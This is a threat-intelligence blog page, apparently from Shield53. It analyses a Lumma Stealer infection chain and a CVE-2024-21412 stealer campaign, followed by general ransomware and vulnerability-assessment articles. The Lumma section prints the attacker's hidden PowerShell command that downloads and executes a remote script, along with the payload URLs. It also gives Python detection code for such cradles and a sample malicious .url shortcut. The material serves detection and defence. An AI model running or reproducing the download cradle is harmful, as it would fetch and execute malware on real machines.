Category: Threat Intelligence

  • In the Wild Lumma Stealer Analysis Report

    In the Wild Lumma Stealer Analysis Report

    Incident Overview

    This report covers a credential-stealing malware family, Lumma Stealer, identified by the Shield53 Security Operations team. The user downloaded a laced PDF file that launched a PowerShell script; the script fetched a TXT file from a CDN, which in turn downloaded and executed a malicious ZIP archive. Detailed analysis reveals the sequence of processes involved and the suspicious commands executed. The following sections describe each stage of the attack and its associated indicators.

    The Threat Intelligence team at Shield53 has identified multiple similar attacks whose Indicators of Attack (IOAs) remain valid for only 4 to 8 hours: the threat actors rotate links and hosting resources frequently to evade detection. Blocking the URLs listed below is therefore a short-lived control, and detection should key on the behaviour of the chain rather than on any single address.

    Detection Summary

    Processes Involved:

    • explorer.exe

    • powershell.exe

    • Set-up.exe

    • more.com

    Command Execution

    The suspicious process powershell.exe was launched with a hidden window (-W Hidden) and an -EncodedCommand (-eC) argument. The command line as captured reads:

    Powershell

    "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -eC iex (iwr https://iilp.b-cdn.net/kolo26.txt -UseBasicParsing).Content

    Analysis:

    This command uses Invoke-Expression (iex) to execute, directly in memory, whatever text Invoke-WebRequest (iwr) returns; -UseBasicParsing avoids the Internet Explorer DOM parser so the cradle works on hardened hosts where IE components are absent. Nothing touches disk at this stage. The script is fetched from the URL:

    https://iilp.b-cdn.net/kolo26.txt

    Retrieved Script Analysis (kolo26.txt):

    The TXT file is a short PowerShell stager. Its parameters, as recovered during analysis:

    • Malicious ZIP File URL: https://261024vexea.b-cdn.net/lopi100.zip

    • Download Path: $env:TEMP\pgl.zip

    • Extraction Path: $env:TEMP\file

    • Execution Path: $env:TEMP\file\Set-up.exe

    The stager downloads the ZIP archive, extracts it, and launches Set-up.exe. Splitting delivery into an in-memory fetch followed by an archive drop and extraction is a classic way to keep the final payload away from inspection of the initial download and to execute it from a user-writable directory.
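    The chain above (explorer.exe launching a hidden-window PowerShell download cradle, the stager dropping a binary in %TEMP%, that binary spawning more.com) is the behaviour a SOC should detect regardless of which CDN hostnames are in use that day. The following is an added triage example written for this article, not Shield53 tooling: it decodes -EncodedCommand arguments so plaintext and Base64 variants hit the same rules, scores one PowerShell command line, and walks parent/child links in process-creation telemetry. The event records are constructed to mirror the reported chain (field names follow Sysmon Event ID 1 conventions, PIDs and the user name are invented); the stager URL is the one reported above.

```python
"""Triage of process-creation telemetry for the reported chain
(explorer.exe -> powershell.exe download cradle -> Set-up.exe -> more.com).
Added example, not Shield53 tooling; sample events are constructed."""
import base64
import re
from collections import namedtuple

Event = namedtuple("Event", "pid ppid image cmdline")

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the
# spellings commonly seen in the wild (matched case-insensitively).
ENC_FLAGS = {"-e", "-ec", "-enc", "-encodedcommand"}
TEMP_DIRS = re.compile(r"(\\appdata\\local\\temp\\|\$env:temp|%temp%)", re.I)


def decode_encoded_command(cmdline):
    """Expand an -EncodedCommand argument (Base64 of UTF-16LE) in place so the
    same regexes work on encoded and plaintext variants. Arguments that are not
    valid Base64 are left untouched, as PowerShell itself would reject them."""
    parts = cmdline.split()
    for i in range(len(parts) - 1):
        if parts[i].lower() in ENC_FLAGS:
            try:
                raw = base64.b64decode(parts[i + 1], validate=True)
                parts[i + 1] = raw.decode("utf-16-le")
                parts[i] = "-Command"
            except (ValueError, UnicodeDecodeError):
                pass
    return " ".join(parts)


def encode_for_powershell(script):
    """Produce the form PowerShell expects after -EncodedCommand; used here only
    to build a constructed sample event."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def powershell_findings(cmdline):
    """Return the indicator names present in one powershell.exe command line."""
    cmd = decode_encoded_command(cmdline).lower()
    found = []
    if re.search(r"-w(indowstyle)?\s+hidden", cmd):
        found.append("hidden_window")
    runs_remote_text = re.search(r"\b(iex|invoke-expression)\b", cmd) and re.search(
        r"\b(iwr|invoke-webrequest|downloadstring|downloadfile)\b", cmd)
    if runs_remote_text:
        found.append("download_cradle")
    if re.search(r"\.(txt|zip)\b", cmd) and re.search(r"https?://", cmd):
        found.append("remote_script_or_archive")
    if re.search(r"expand-archive|start-process", cmd) and TEMP_DIRS.search(cmd):
        found.append("stage_in_temp")
    return found


def find_chain(events):
    """Walk parent/child links and report each stage of the reported chain.
    Returns a list of (pid, rule) tuples; an empty list means nothing matched."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        parent = by_pid.get(e.ppid)
        pimg = parent.image.lower() if parent else ""
        img = e.image.lower()
        if img.endswith("powershell.exe"):
            hits = powershell_findings(e.cmdline)
            if "download_cradle" in hits:
                alerts.append((e.pid, "powershell_download_cradle:" + ",".join(hits)))
                if pimg.endswith("explorer.exe"):  # user double-clicked something
                    alerts.append((e.pid, "user_launched_cradle"))
        # A binary run from %TEMP% by PowerShell is the freshly extracted stage.
        if pimg.endswith("powershell.exe") and TEMP_DIRS.search(img):
            alerts.append((e.pid, "powershell_spawned_temp_binary"))
        # more.com is a legitimate Windows binary; it is only suspicious when
        # its parent is something that has no business running it.
        if img.endswith("\\more.com") and parent and TEMP_DIRS.search(pimg):
            alerts.append((e.pid, "temp_binary_spawned_more_com"))
    return alerts


# Constructed sample telemetry (not the original events). The cradle is
# embedded in Base64 form so the decoding path is exercised.
STAGER = "iex (iwr https://iilp.b-cdn.net/kolo26.txt -UseBasicParsing).Content"
SAMPLE_EVENTS = [
    Event(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    Event(200, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShell.exe" -W Hidden -eC '
          + encode_for_powershell(STAGER)),
    Event(300, 200, r"C:\Users\u\AppData\Local\Temp\file\Set-up.exe",
          r"C:\Users\u\AppData\Local\Temp\file\Set-up.exe"),
    Event(400, 300, r"C:\Windows\SysWOW64\more.com", "more.com"),
    Event(500, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -NoProfile -Command Get-Date"),  # benign control
]

if __name__ == "__main__":
    for pid, rule in find_chain(SAMPLE_EVENTS):
        print(pid, rule)
```

    The rules deliberately ignore hostnames: with indicators rotating every few hours, the stable signal is the combination of hidden window, in-memory execution of remote text, an archive staged under %TEMP%, and a legitimate system binary spawned from that directory. Feed it Sysmon or 4688 events with parent PIDs and it reports each stage separately, so a partial chain (for example a cradle that was blocked before the ZIP stage) still surfaces.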

    Execution and Analysis

    The final payload, Set-up.exe, was executed after extraction. Further details from the AnyRun sandbox environment provide insights into the behavior of this executable and its role in the credential-stealing process.

    Indicators of Compromise (IOCs)

    PowerShell Command

    C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe -W Hidden -eC iex (iwr https://iilp.b-cdn.net/kolo26.txt -UseBasicParsing).Content

    TXT File URL

    https://iilp.b-cdn.net/kolo26.txt

    ZIP File URL

    https://261024vexea.b-cdn.net/lopi100.zip

    File Path

    C:\Windows\SysWOW64\more.com

    Note that more.com is a legitimate Windows binary, so the path on its own is not an indicator; the signal is its appearance in this process chain alongside Set-up.exe rather than in a normal console session.

    Analysis Links:

  • Recent Info Stealer Phishing Campaigns

    Recent Info Stealer Phishing Campaigns

    This article presents a detailed analysis of a stealer campaign exploiting CVE-2024-21412, a security feature bypass in Microsoft Windows SmartScreen. The vulnerability enables remote attackers to bypass the SmartScreen security warning dialog, thereby facilitating the delivery of malicious files. Over the past year, threat actors such as Water Hydra, and campaigns distributing stealer families such as Lumma Stealer and Meduza Stealer, have leveraged this vulnerability.

    Attack Methodology

    The campaign begins with the attacker constructing a malicious link that leads to an Internet Shortcut (.url) file. Once the victim interacts with the link, the shortcut retrieves an LNK file, which in turn fetches an executable file embedding an HTA script. This script decodes and decrypts PowerShell code, which subsequently downloads additional files, including a decoy PDF and a malicious shellcode injector.
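    The first hop of that chain is a plain text file, which makes it the cheapest stage to triage at the mail gateway or on the endpoint. The following is an added example, not Fortinet's or Shield53's code: a static check for .url files that parses the INI-style [InternetShortcut] section and flags the traits of the CVE-2024-21412 pattern, namely a target that is a file on a remote share rather than a web page (a file opened this way carries no usable Mark of the Web, which is what defeats the SmartScreen prompt) and a target or icon path that points at another shortcut or executable. The sample shortcut contents and the 203.0.113.x addresses are constructed for the example.

```python
"""Static triage of Internet Shortcut (.url) files. Added example, not code
from the referenced report; the sample files below are constructed."""
import configparser
import re
from urllib.parse import urlparse

# Extensions that have no business being the target of a web shortcut.
STAGE_EXT = re.compile(r"\.(url|lnk|hta|exe|js|vbs|cmd|bat|ps1|msi)$", re.I)


def parse_url_file(text):
    """Return the [InternetShortcut] fields as a dict with lower-case keys.
    .url files are INI files; values are unquoted and may contain '%' or '='."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    if not cp.has_section("InternetShortcut"):
        return {}
    return dict(cp.items("InternetShortcut"))


def triage_url_file(text):
    """Return the list of suspicious traits found in one .url file."""
    fields = parse_url_file(text)
    findings = []
    target = fields.get("url", "")
    parsed = urlparse(target)
    # file://host/share/... opens a file over SMB/WebDAV instead of a web page;
    # the bypass chain used exactly this to hand the victim a remote .url/.lnk.
    if parsed.scheme.lower() == "file" and parsed.netloc:
        findings.append("remote_file_target")
    if target.startswith("\\\\"):          # raw UNC path, same effect
        findings.append("unc_target")
    if STAGE_EXT.search(parsed.path or target):
        findings.append("target_is_executable_or_shortcut")
    icon = fields.get("iconfile", "")
    # A remote IconFile is fetched by Explorer as soon as the folder is viewed;
    # it is both a fetch trigger and an NTLM hash leak.
    if icon.startswith("\\\\") or icon.lower().startswith("http"):
        findings.append("remote_icon")
    return findings


# Constructed samples (not taken from the campaign).
MALICIOUS_URL_FILE = r"""[InternetShortcut]
URL=file://203.0.113.5/dav/invoice.url
IconIndex=0
IconFile=\\203.0.113.5\dav\icon.ico
"""

BENIGN_URL_FILE = r"""[InternetShortcut]
URL=https://www.example.com/
"""

if __name__ == "__main__":
    for name, body in (("malicious", MALICIOUS_URL_FILE), ("benign", BENIGN_URL_FILE)):
        print(name, triage_url_file(body) or "clean")
```

    Any of these traits is unusual for a shortcut a user would legitimately receive, so a single hit is enough to quarantine the file for a closer look; the patched SmartScreen behaviour closes the specific bypass, but a .url whose target is a remote executable is worth blocking on unpatched and patched hosts alike.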

    Stealer Deployment and Injector Techniques

    The campaign employs two main types of shell code injectors:

    1. Image-Based Injector: This injector downloads a seemingly harmless image file, reads its pixel values through the GDI+ API GdipBitmapGetPixel, and reassembles shellcode from those values. The shellcode is then executed to download and deploy stealers such as HijackLoader, Lumma Stealer, and ACR Stealer.

    2. Straightforward Injector: This injector decrypts its payload from its own data section and uses a sequence of native API calls (NtCreateSection and NtMapViewOfSection among them) to map the shellcode into a target process, ultimately deploying the Meduza Stealer.

    Final Payloads

    The attack culminates in the deployment of various stealer variants, including Meduza Stealer and ACR Stealer. These stealers are capable of exfiltrating sensitive data, including browser credentials, cryptocurrency wallets, FTP clients, email clients, and even specific Chrome extensions. The Meduza Stealer communicates with its C2 server via a panel, while the ACR Stealer uses a dead drop resolver technique, leveraging platforms like Steam to hide its C2 communications.

    Mitigation Strategies

    To counter such attack chains, organizations should:

    • Educate Users: Users should be made aware of the risks associated with downloading and executing files from unverified sources.

    • Implement Robust Security Protocols: Proactive security measures, including advanced endpoint detection and response (EDR) systems, should be employed.

    • Regular Security Audits: Organizations should conduct frequent security audits and vulnerability assessments to identify and mitigate potential risks.

    Conclusion

    This stealer campaign underscores the evolving tactics employed by cybercriminals to bypass security measures and execute sophisticated attacks. Organizations must remain vigilant and adapt their cybersecurity strategies to address these advanced threats effectively.

    Reference

    Detailed InfoStealer Investigation by Fortinet Team: https://www.fortinet.com/blog/threat-research/exploiting-cve-2024-21412-stealer-campaign-unleashed

  • The Evolving Threat of Ransomware: A New Tool to Disable EDR

    The Evolving Threat of Ransomware: A New Tool to Disable EDR

    Introduction

    As ransomware threats evolve, so do the tools and tactics employed by cybercriminals. A recent warning from cybersecurity experts highlights a new capability in a tool used by ransomware gangs, which could significantly impact the efficacy of endpoint protection software.

    The Emergence of Poortry/BurntCigar

    Sophos researchers have recently identified the use of an updated toolset, known as Poortry or BurntCigar, by ransomware groups. Previously, this toolset was known for terminating the processes of Endpoint Detection and Response (EDR) systems, allowing ransomware to operate with minimal resistance. In a concerning development, the tool has now been observed deleting EDR components from victim systems outright.

    The New Threat Landscape

    This new capability was first reported by Trend Micro last year, but the recent Sophos investigation marks the first time this EDR-wiping functionality has been seen in action. The implications are significant: by eliminating EDR software, ransomware groups can clear the way for their malware to operate unchecked, making it even more challenging for defenders to respond in time.

    Implications for Cybersecurity

    The ability to wipe out EDR software represents a serious escalation in the capabilities of ransomware gangs. It underscores the need for organizations to adopt a multi-layered security approach that includes regular backups, network segmentation, and robust incident response strategies. Because Poortry runs as a kernel-mode driver that the attackers load with an abused code-signing certificate, controls that stop the driver from loading in the first place (Microsoft's vulnerable driver blocklist, HVCI/memory integrity, and EDR tamper protection) matter as much as detecting the kill after the fact.

    Conclusion

    As ransomware tools become more sophisticated, cybersecurity defenses must evolve in tandem. The discovery of Poortry’s enhanced EDR-wiping ability is a stark reminder that the fight against ransomware is far from over. Continuous vigilance, combined with adaptive security measures, is essential to protect against these ever-evolving threats.

    Call to Action

    Stay informed about the latest cybersecurity threats and ensure your organization’s defenses are up to date. Consider conducting regular security assessments and investing in advanced threat detection capabilities to stay ahead of cybercriminals.

  • The Evolving Cyber Threat Landscape

    The Evolving Cyber Threat Landscape

    In today’s rapidly evolving digital world, cyber threats are becoming increasingly sophisticated and frequent. Organizations of all sizes face a growing array of risks, from ransomware and phishing attacks to zero-day exploits and advanced persistent threats (APTs). To protect against these ever-evolving threats, it is crucial for businesses to conduct regular vulnerability assessments. This proactive approach helps identify, prioritize, and remediate security weaknesses before they can be exploited by malicious actors.

    Understanding the Threat Landscape

    1. Ransomware Attacks:

      • Ransomware attacks continue to be one of the most disruptive forms of cybercrime. In 2024, ransomware incidents have surged, targeting critical infrastructure sectors such as healthcare, finance, and energy (Canadian Centre for Cyber Security). Attackers encrypt critical data and demand a ransom for its release, causing significant operational disruptions and financial losses.

    2. Phishing Attacks:

      • Phishing remains a prevalent threat, with attackers using increasingly sophisticated techniques to deceive users into revealing sensitive information or downloading malicious software. In North America, phishing was involved in 36% of data breaches, leading to credential theft and unauthorized access (Canadian Centre for Cyber Security).

    3. Advanced Persistent Threats (APTs):

      • APTs are long-term targeted attacks where cybercriminals infiltrate an organization's network and remain undetected for extended periods. These attacks are often state-sponsored and focus on stealing sensitive data or intellectual property.

    4. Zero-Day Exploits:

      • Zero-day vulnerabilities are security flaws that are unknown to the software vendor and have no available patches. Cybercriminals exploit these vulnerabilities to launch attacks before the vendor can issue a fix, making zero-day exploits highly dangerous.

    The Importance of Regular Vulnerability Assessments

    1. Proactive Risk Identification:

      • Regular vulnerability assessments help identify security weaknesses before they can be exploited. By proactively scanning systems, applications, and networks, organizations can discover vulnerabilities early and take corrective actions to mitigate risks.

    2. Enhanced Security Posture:

      • Conducting frequent assessments ensures that your organization’s security measures are up-to-date and effective against the latest threats. This continuous improvement process helps maintain a robust security posture and reduces the attack surface.

    3. Regulatory Compliance:

      • Many industries are subject to stringent regulatory requirements regarding data protection and cybersecurity. Regular vulnerability assessments help organizations meet compliance standards such as GDPR, HIPAA, PCI DSS, and ISO 27001, avoiding legal penalties and protecting sensitive information.

    4. Cost-Effective Security:

      • Identifying and addressing vulnerabilities early can save organizations significant costs associated with data breaches, including financial losses, reputational damage, and legal fees. Preventive measures are often more cost-effective than reactive responses to security incidents.

    5. Informed Decision-Making:

      • Vulnerability assessments provide detailed insights into the security status of your IT infrastructure. These insights enable informed decision-making regarding resource allocation, security investments, and risk management strategies.

    The dynamic nature of cyber threats necessitates a proactive and continuous approach to security. Regular vulnerability assessments are a critical component of an effective cybersecurity strategy, helping organizations identify and mitigate risks before they can be exploited. At Shield 53, we specialize in conducting comprehensive vulnerability assessments to ensure your business remains secure against evolving threats. By staying ahead of potential vulnerabilities, you can safeguard your digital assets, maintain regulatory compliance, and protect your organization’s reputation.

    For more information on our vulnerability assessment services and how we can help your organization, contact us today. Let’s work together to secure your digital future.

  • The Growing Ransomware Threat in 2024

    The Growing Ransomware Threat in 2024

    Ransomware attacks have surged in 2024, presenting a significant and growing threat to organizations worldwide. According to the reports cited below, ransomware incidents have increased by 68% compared to the previous year. Notably, the LockBit ransomware gang has been responsible for some of the largest ransom demands, including a staggering $80 million following an attack on Royal Mail. These attacks have become more sophisticated, with cybercriminals utilizing zero-day vulnerabilities and evolving their tactics to target a higher volume of victims simultaneously (Sophos News) (Rapid7).

    The financial impact of ransomware attacks has also escalated. The average ransom payment has increased fivefold over the last year, from $400,000 to $2 million (Rapid7) (SecurityWeek). Notably, while the share of surveyed organizations reporting an attack fell slightly, the overall recovery cost has soared to an average of $2.73 million per incident, highlighting the substantial financial burden on affected organizations. Despite these rising costs, more than half of the organizations hit by ransomware have admitted to paying the ransom to recover their data, reflecting the desperation and critical nature of these situations.

    Moreover, the threat landscape continues to evolve with an increasing trend of data exfiltration, where cybercriminals steal sensitive data in addition to encrypting systems. This dual threat of data theft and encryption has intensified the pressure on organizations to bolster their cybersecurity measures. As ransomware remains a top priority for executive leadership, with many companies making significant investments in prevention and recovery strategies, it is clear that combating this menace requires continuous vigilance and robust security practices (Malwarebytes) (SecurityWeek).

    For more details on the latest ransomware trends and defense strategies, refer to the comprehensive reports from Sophos, Rapid7, and Malwarebytes (Sophos News) (Rapid7) (Malwarebytes) (SecurityWeek).